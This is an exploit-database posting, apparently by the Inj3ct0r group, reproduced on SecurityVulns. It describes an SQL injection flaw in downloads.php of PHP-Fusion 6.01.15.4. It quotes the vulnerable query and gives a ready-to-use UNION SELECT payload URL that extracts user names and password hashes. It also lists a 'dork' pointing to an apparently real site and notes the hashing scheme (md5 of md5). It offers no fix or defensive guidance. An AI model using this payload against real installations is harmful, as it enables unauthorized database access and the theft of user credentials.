SecurityvulnsSECURITYVULNS:DOC:23372PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability
===================================================================
PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \\\ \/\ \\ 0
0 \//\//\//\ \\ \// \// \// \// \// 1
1 \ \/ >> Exploit database separated by exploit 0
0 \// type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
Product: PHP-Fusion
Version: 6.01.15.4
Dork : http://www.rus-phpfusion.com/news.php?readmore=32
Error in file downloads.php
PHP code:
$result = dbquery("SELECT * FROM ".$db_prefix."downloads WHERE download_id='$page_id'");
A vulnerable parameter $ page_id
Exploit:
downloads.php?page_id=-1%27+union+select+1,2,user_name,4,user_password,6,7,8,9,10,11,12,13,14,15,16,17+from+rusfusion_users+limit+0,1/*
Example:
password is encrypted by: md5 (md5 ($ pass))